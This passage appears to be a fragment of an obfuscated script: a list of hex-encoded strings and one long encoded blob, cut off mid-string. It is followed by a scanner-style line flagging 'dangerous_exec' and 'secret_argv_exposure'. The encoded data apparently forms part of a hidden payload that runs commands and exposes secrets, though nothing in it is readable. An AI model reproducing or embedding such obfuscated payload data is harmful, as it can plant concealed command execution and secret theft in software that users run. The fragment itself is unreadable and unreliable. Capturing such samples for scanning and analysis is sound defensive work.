a09c9b81cd","4b3e253823222d3f","21464455684f551213","ddbab8a994b3a9eeef","254240516c4b511617","c5a2a0b18cabb1f6f7","9be9eef5","ccadbcbca0b5","274657574b5e","2b4942454f","fa9b8a8a9683","52313d3c313326","33435c44","e7959289","5c2e2932","6b191e05","fc8e8992","deacabb0","3c5059525b4854","770f4447440f4547454e440f4347460f4445460f4447450f45474647420f4447440f45474645130f4447450f4446440f4446440f40474f0f4446430f4446450f44474f0f44154f4544474745444645451245404614464f45444746454245404544474545444744454f454145444743444446114747451145404544474245444741454f454145444740444445444745454f46114746451145404544474f4545474745404544474f454f45444742454f4544474e4444444e45140f4440124544471645444742454f4544474f454f444445404544471545444745454f45444716454f444445404544471445454746454045444714454f45444715454f4544474e4444444e45140f44434f4544471345444715454f45444714454f4444454045444713454f454447124444474f454145140f444740454345444713454f454447114444454145140f44471645434
...[truncated 27 chars]
Detected: suspicious.dangerous_exec, suspicious.secret_argv_exposure